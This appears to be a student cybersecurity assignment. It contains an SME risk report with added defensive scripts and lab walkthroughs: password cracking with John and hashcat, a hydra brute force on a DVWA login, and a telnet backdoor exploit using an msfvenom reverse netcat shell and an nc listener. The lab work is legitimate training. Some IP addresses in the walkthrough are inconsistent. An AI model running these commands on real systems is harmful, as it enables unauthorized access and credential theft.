
UNIVERSITI TUNKU ABDUL RAHMAN

FACULTY OF INFORMATION COMMUNICATION TECHNOLOGY

OCTOBER 2022 TRIMESTER

UCCN1223 CYBERSECURITY

GROUP ASSIGNMENT COVER SHEET

Student Name     Student ID     Practical Group     Programme
Wong Wai Chun    21ACB06087     P14                 CS
Ong Zhan Wen     210ACB4076     P14                 CS
Sim Kah Hoe      210ACB6036     P14                 CS
Kaw Wei Xin      20ACB05200     P14                 CS

Marks:   Part A:        Part B:        Part C:        Part D:

Marking Scheme

Part A (5%)
Item                                                              Marks Allocated   Marks Awarded
1. Introduction                                                   1
2. Cyber security risks and threats                               2
   a. Identify and assess security risks, threats and vulnerabilities
   b. Prescribed procedures to evaluate risk levels and the potential impact of threats and vulnerabilities on SMEs
3. New proposal – Cybersecurity Strategy                          2
   a. Technical
   b. Policy
   c. Human
   d. Cybersecurity Governance
TOTAL                                                             5

Part B (5%)
File ID   Marks Allocated   Marks Awarded
File 1    1
File 2    1
File 3    1
File 4    1
File 5    1
TOTAL     5

Part C (5%)
File ID   To-Do                                                        Marks Allocated   Marks Awarded
Step2     Show nmap screenshots & explain command                      1
Step5     Write-up on hydra command & parameter used (+screenshots)    3
Step6     Show the password                                            1
TOTAL                                                                  5

Part D (5%)
File ID   To-Do                                                        Marks Allocated   Marks Awarded
Step1     Show your writeup                                            1
Step2     Show the welcome message                                     1
Step3     Show the screenshots on msfvenom                             1
Step4     Show how you start a netcat and gain reverse shell           1
Step5     Show the final flag value                                    1
TOTAL                                                                  5
Title: Report on cyber security risks faced by SMEs and ways to overcome them

Introduction

Cybersecurity is the protection of information in a networked environment and the defense of
Internet-connected systems, including data, software and hardware, against cyber threats.
Cybersecurity plays an important role in modern society because people's daily lives are
dominated by the Internet, and the workplace is the primary place where the Internet is used.
Both large and small businesses need the Internet to support operations and transactions such
as stock purchases. Cybersecurity is therefore essential for companies of all sizes, and
especially for SMEs, because it helps them protect their Internet-facing systems and defend
against cyber threats. However, because their cybersecurity is often not yet complete or
robust enough, SMEs are frequently exposed to several common cyber security risks, attacks
and vulnerabilities. In this report we therefore identify the cyber security risks faced by SMEs
and make a new proposal to overcome them.

Cyber security risks and threats faced by SMEs

Phishing attacks
Phishing is a type of attack used by hackers to steal users' data, including login credentials
and credit card numbers. It usually happens when the attacker poses as a trusted entity, for
example by sending emails that appear to come from a reputable source, which then trick users
into clicking malicious links that leak their information to the attacker. Most attackers trick
SME owners into clicking such suspicious links so that their data is taken or held to ransom by
ransomware, which can only be removed by paying the attackers.

Data Breach
A data breach is an incident in which information is taken from a system without the permission
or authorisation of the system owners, in this case the SME owners. Many attacks target SMEs
because SMEs have a false sense of security about their cyber defenses. Furthermore, SMEs hold
a large amount of user data, which is very appealing to attackers.

Supply Chain Attacks
Also known as value-chain or third-party attacks, these happen when someone infiltrates a
system through an outside partner or provider that has access to the victim's data. The attacker
slips malicious code or a malicious component into trusted software, which is then shipped to
the victim. Later, a well-timed command to that malicious code or component allows the attacker
to intrude into the system.

DDoS attack
A DDoS (Distributed Denial of Service) attack is a type of cyber threat faced by SMEs in which
attackers attempt to disrupt the normal flow of traffic to the servers or network services used
by the SME by overwhelming them with a sudden flood of Internet traffic. The attack increases
its effectiveness by using many other compromised computer systems as sources of network
traffic.

Procedures to evaluate risk levels and the potential impact of threats and vulnerabilities
on SMEs

Identify Cyber Threats
A cyber threat is an event that could cause harm to an organisation, in this case an SME. Such
events include security breaches, DDoS attacks, malware, ransomware and so on. Different types
of events carry different levels of threat: some are merely annoying, such as pop-up ads, while
others are very dangerous because they involve stealing users' data.

Identify Vulnerability
A vulnerability is a potential weak point that attackers can use to get through the security
defenses of a system. It is often caused by not updating antivirus software to the latest
version, so that it cannot keep up with the constantly appearing new types of malware.
Sometimes the vulnerability is caused by human error or an insider attack.

Identify and organize data storage based on risks
SMEs need to identify the most important and sensitive data in their systems or servers. Using
reliable software, they can discover which data is most prone to attack, and they can mitigate
the damage of an attack by handling or storing that data in a much safer environment.

Taking action to mitigate risks
Once all vulnerabilities and loopholes in a system or server have been located, they can be
patched by adding firewalls, moving to better antivirus software or updating the existing
software.
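The four procedure steps above (identify threats, identify vulnerabilities, rank the data and systems at risk, then mitigate) are usually written down as a risk register. The following Python script is an added example, not part of the report: it scores each entry as likelihood x impact on a 1 to 5 scale, maps the product to a qualitative level, and ranks the register so the highest risks are mitigated first. The four threats are the ones discussed in the report; the vulnerabilities, assets and the likelihood/impact values are constructed for illustration and are not an assessment of any real organisation.

```python
"""Qualitative risk scoring for an SME risk register (added example)."""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class Risk:
    threat: str          # event that could harm the SME (e.g. phishing)
    vulnerability: str   # weak point the threat would exploit
    asset: str           # data or system that would be affected
    likelihood: int      # 1 (rare) .. 5 (almost certain)
    impact: int          # 1 (negligible) .. 5 (severe)

    def __post_init__(self) -> None:
        # Reject values outside the 1..5 scale so a typo cannot silently
        # produce a score that sorts to the wrong place in the register.
        for name in ("likelihood", "impact"):
            value = getattr(self, name)
            if not 1 <= value <= 5:
                raise ValueError(f"{name} must be in 1..5, got {value}")

    @property
    def score(self) -> int:
        """Likelihood x impact, in the range 1..25."""
        return self.likelihood * self.impact


def risk_level(score: int) -> str:
    """Map a 1..25 likelihood x impact product to a qualitative level.

    The thresholds are a common 5x5 matrix convention, chosen here for
    illustration; an SME would set its own appetite.
    """
    if score >= 15:
        return "Critical"
    if score >= 10:
        return "High"
    if score >= 5:
        return "Medium"
    return "Low"


def rank_register(register: List[Risk]) -> List[Tuple[str, int, str]]:
    """Return (threat, score, level) sorted highest risk first.

    Ties are broken by impact so that a severe-but-rare event is not
    buried below a frequent nuisance with the same product.
    """
    ordered = sorted(register, key=lambda r: (r.score, r.impact), reverse=True)
    return [(r.threat, r.score, risk_level(r.score)) for r in ordered]


# Constructed sample register covering the four threats the report discusses.
SAMPLE_REGISTER = [
    Risk("Phishing", "untrained staff click links", "staff credentials", 5, 4),
    Risk("Data breach", "unpatched file server", "customer database", 3, 5),
    Risk("Supply chain attack", "unverified third-party software updates",
         "internal systems", 2, 5),
    Risk("DDoS", "single public web server, no rate limiting", "online shop", 3, 3),
]


if __name__ == "__main__":
    for threat, score, level in rank_register(SAMPLE_REGISTER):
        print(f"{threat:<22} score={score:>2}  level={level}")
```

With the constructed values, phishing (20) and the data breach (15) come out as critical, the supply chain attack (10) as high and DDoS (9) as medium, which is the order in which the mitigation step would address them.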

New proposal – Cybersecurity Strategy

Technical

One of the easiest and most effective ways is to install anti-virus and anti-spyware software on
every computer that has access to the business's files and data. Anti-virus and anti-spyware
software scan the computer thoroughly to identify potential threats and malware and remove
them. Convenient as they are, they sometimes make mistakes, such as identifying a safe file as
malicious or missing malicious files or software. To improve accuracy, the technician or an
employee of the company can run multiple scans before deleting the files reported as malicious.
The company also has to make sure that the anti-virus and anti-spyware software are always up to
date: hackers and cyber criminals are constantly improving their malware, so the company should
stay as up to date as possible to prevent newer malware from entering the system. Some of the
most common malware are viruses, worms and trojan horses, and the company should always be on
the lookout for them.

On the other hand, authentication is an option that requires close to no cost at all. Every
computer should have its own password to prevent collateral losses. From a cyber security
perspective, the longer the password and the more types of characters it mixes, the harder it is
for a hacker to crack it. For example, the alphabet has 26 letters; if the user mixes capital and
small letters, the hacker has to try 52 different letters for each letter in the password, and if
the password is 10 letters long the hacker will have to try 144,555,105,949,057,024 (52^10)
different combinations to be sure of finding the correct one. The number of combinations grows
larger still if the company mixes numbers and special symbols into its passwords. To make
security even more solid, the company can also enable multi-factor authentication such as OTP or
security questions. Biometric tools such as fingerprint or facial recognition are also a safe
and convenient way to authenticate because every fingerprint and facial feature is different.
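The following Python script is an added example, not part of the report, that carries the arithmetic in the paragraph above through in code: it computes the worst-case number of guesses and the equivalent entropy in bits for a given character set and length, and generalises from the 52-letter case to the digit and symbol classes the paragraph mentions. The class sizes for letters and digits are standard; the 32-symbol class size and the guessing rate of 10^10 guesses per second are assumptions used only for illustration.

```python
"""Password search-space arithmetic (added example, not the report's code)."""
import math
from typing import Iterable, List, Tuple

# Size of each character class. "symbol" is assumed to be the 32 printable
# ASCII punctuation characters; a real policy may permit a different set.
CLASS_SIZES = {
    "lower": 26,
    "upper": 26,
    "digit": 10,
    "symbol": 32,
}


def alphabet_size(classes: Iterable[str]) -> int:
    """Number of distinct characters available when the given classes are mixed."""
    chosen = set(classes)
    unknown = chosen - CLASS_SIZES.keys()
    if unknown:
        raise ValueError(f"unknown character classes: {sorted(unknown)}")
    return sum(CLASS_SIZES[c] for c in chosen)


def keyspace(alphabet: int, length: int) -> int:
    """Distinct passwords of exactly `length` characters from `alphabet` symbols.

    This is the worst-case number of guesses an exhaustive search must make;
    on average about half of them are needed.
    """
    if alphabet < 1 or length < 1:
        raise ValueError("alphabet and length must be positive")
    return alphabet ** length


def entropy_bits(alphabet: int, length: int) -> float:
    """Entropy of a uniformly random password, in bits (log2 of the keyspace)."""
    return length * math.log2(alphabet)


def worst_case_days(alphabet: int, length: int, guesses_per_second: float) -> float:
    """Days an attacker needs to exhaust the keyspace at the given guess rate."""
    return keyspace(alphabet, length) / guesses_per_second / 86400


def compare_policies(length: int,
                     guesses_per_second: float = 1e10) -> List[Tuple[str, int, int, float, float]]:
    """Table of (policy, alphabet, keyspace, bits, worst-case days) for one length.

    The default guess rate of 1e10/s is an assumed offline-cracking rate for
    illustration only.
    """
    policies = [
        ("lowercase only", ["lower"]),
        ("mixed case", ["lower", "upper"]),
        ("mixed case + digits", ["lower", "upper", "digit"]),
        ("mixed case + digits + symbols", ["lower", "upper", "digit", "symbol"]),
    ]
    rows = []
    for name, classes in policies:
        size = alphabet_size(classes)
        rows.append((name, size, keyspace(size, length),
                     round(entropy_bits(size, length), 1),
                     worst_case_days(size, length, guesses_per_second)))
    return rows


if __name__ == "__main__":
    for name, size, space, bits, days in compare_policies(10):
        print(f"{name:<32} alphabet={size:>2} keyspace={space:,} "
              f"bits={bits} worst-case={days:,.1f} days")
```

Running it for length 10 reproduces the report's 144,555,105,949,057,024 combinations for the mixed-case alphabet (about 57 bits), and shows why the same length drawn from all four classes is a much stronger policy than simply adding capital letters.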

Policy

All computers and mobile devices connected to the company's network and networked resources
must have anti-virus and anti-spyware software installed and configured so that detection of
malicious files is always up to date, by routinely updating the software. This software must be
actively running on the computers and devices. The anti-virus and anti-spyware software must not
be disabled or bypassed by anyone other than IT experts, or without their supervision and
approval. The software's settings must not be altered in any way that lets certain malware
through or reduces the effectiveness of the software. Every file server attached to the company
network must be scanned and inspected by the IT department to detect and delete malware that
could potentially infect the company's resources.

Human

Every employee is required to have basic knowledge of cybersecurity. Employees should not
download personal content onto, or use, computers connected to the company's server for their
own personal purposes such as social media, online shopping, etc. The company can also hire a
third-party cybersecurity team in case the company is attacked by a group of hackers. This can
help to reduce the losses or even prevent any loss.

Cybersecurity governance

A good Incident Response Plan (IRP) can save a lot of time in an emergency. Time is of the
essence when it comes to minimizing the loss from a cyber crime. A good Incident Response Plan
can shorten the process by half and sort the situation out accordingly, instead of panicking
and failing to solve the problems one by one, making sure the company's response is smooth and
organized. The Incident Response Plan should be clear on the steps for different cases such as a
data breach, an insider threat or a ransomware attack. One of the steps in the incident response
plan is assigning the people or experts responsible for discovering and eliminating the source
of the threat.

Secondly, the company must know how to identify its vulnerabilities. No matter how perfect the
cybersecurity team the company hires, its biggest vulnerability will always be its employees.
So the company should improve the overall cybersecurity knowledge and awareness of its employees
by training and educating them.

Conclusion

In a nutshell, SMEs have to prioritize their cyber security to defend themselves from hackers
and prevent loss of money and information. SMEs are more easily targeted and attacked by hackers
because of the low attention they pay to their cyber security, and that is their weakness. As
technology becomes more and more advanced, technical and computing knowledge has spread to the
public. It is no longer surprising that any citizen in Malaysia can crack passwords, since a lot
of knowledge and information is posted on the Internet, especially on Google and YouTube, which
almost everyone uses nowadays. With just a simple device that can access the Internet, people
can learn a lot of things, including hacking. Cyber security is gradually becoming important in
our lives, whether for people who browse the Internet or for enterprises, because all of us are
starting to store information and data on the Internet. As long as our data exists on the
Internet, there is a risk that our information, data or even privacy will be violated at any
time. Hence, SMEs should not underestimate the importance of cyber security for their company,
since neglecting it will cause a great loss. I hope that this report is able to raise awareness
of cyber security among SMEs and help them to prevent further loss in the future.

File1.doc

Step 1: Hash file1.doc.

Step 2: Run John with incremental mode = digits and length = 5 to crack the password.

Password = 57913

File2.doc
Step 1: Hash file2.doc and cat the hash file.

Step 2: Crack the password with John, setting incremental mode = upper and length = 6.

Password = HJGYBN

File3.doc
Step 1: Hash file3.doc and cat the hash file.

Step 2: Crack the password with John, setting incremental mode = alpha and length = 6.

Password = SgIAvb

File4.doc
Step 1: Hash file4.doc and cat the hash file.

Step 2: Crack the password with John, setting incremental mode = alnum and length = 6.

Password = 9Akk6Z

File5.doc
Step 1: Hash file5.doc and cat the hash file.

Step 2: Crack the password using hashcat.

Password = *72@3#

Part C
Step 2:
First, we need to use the $ifconfig command to find out our Kali Linux server's IP address.
Secondly, we use the nmap ping scan command, $nmap -sn 192.168.0.11/24, to perform a ping
scan from the Kali Linux server to identify the IP address of avo-server. The 192.168.0.11/24
tells nmap to ping scan from 192.168.0.0 to 192.168.0.255. We can see that there is an nmap
scan report that shows the avo-server IP address as 192.168.0.13.

After that we ping 192.168.0.13 to ensure the Kali Linux server can reach that IP address.
($ping 192.168.0.13)

Step 5:
First, I enter hydra with the $hydra command to perform the brute-force attack. Secondly, I
type $find / -name "rockyou*" 2>/dev/null to find out where the rockyou.txt file is. Then I
enter the directory /usr/share/wordlists, which contains the rockyou.txt file, with the $cd
command. Next, I use the $ls command to list all the files inside the directory. We can see that
it contains rockyou.txt.gz, and I use $gunzip rockyou.txt to extract the rockyou.txt file.
After that, I use the command $hydra -l admin -P rockyou.txt 192.168.0.13 http-post-form
"/dvwa/login.php:username=^USER^&password=^PASS^:Login failed" to perform the brute-force
attack on the DVWA login page. admin represents the user and rockyou.txt represents the
wordlist, which acts as the password list for the brute-force attack. 192.168.0.13 is the
target IP address for the brute-force attack and http-post-form is the method used to perform
it. Lastly, /dvwa/login.php is the DVWA login URL, username=^USER^&password=^PASS^ represents
the parameters, and Login failed is the error message shown when a login fails. After
performing the brute-force attack, hydra shows the possible valid passwords from rockyou.txt.

Here is the screenshot of the command used to perform the brute-force attack.

Step 6
Since 16 valid passwords were found, we need to try them one by one. In the end, I found that
the actual password for the "admin" user is "password".

Successfully logged in with username "admin" and password "password".

Part D: Exploiting Telnet

Step 1:
Narrow down the candidates for the server IP hosting the TELNET server by retrieving my
device's IP address with $ ifconfig.
Next, perform an nmap scan on the IP address range of my device with $ nmap -sS 192.168.1.0/24.
The /24 restricts nmap to the 24-bit network prefix, limiting the scan to the hosts .0 to .255.
The output below is the scan report from the command:

The IP address with the most ports among all the IP addresses in the output is therefore, it
is safe to assume, the host running the TELNET server.
To probe this address, the command $ nmap -p- 192.168.0.192 is used to list every port
currently available on this IP address, including the hidden ports.

By comparing the current output with the first output, it becomes clear that the ports with
values of 8015 or greater are the hidden ports. Therefore, it is feasible that the TELNET server
is on one of the hidden ports.

Step 2
To test whether the above assumption is correct, the command $ telnet 192.168.1.164 8015 is
used as an attempt to telnet to the server.

A message is shown upon connecting:

AVO'S BACKDOOR. Type .HELP to view commands

Step 3
Generate a reverse shell payload with the msfvenom command
$ msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.164 lport=2233 R

Step 4
Start the reverse shell via the telnet session on the server with the command $.RUN [output from msfvenom]
At the same time, start a netcat listener as well, to listen for the server, with the command
$ nc -nvlp 2233
The connection to the Telnet server is established once the reverse shell is activated.

Step 5
Extract the contents of root.txt to obtain the final flag with the command $ cat root.txt
The output shown is the final flag value.
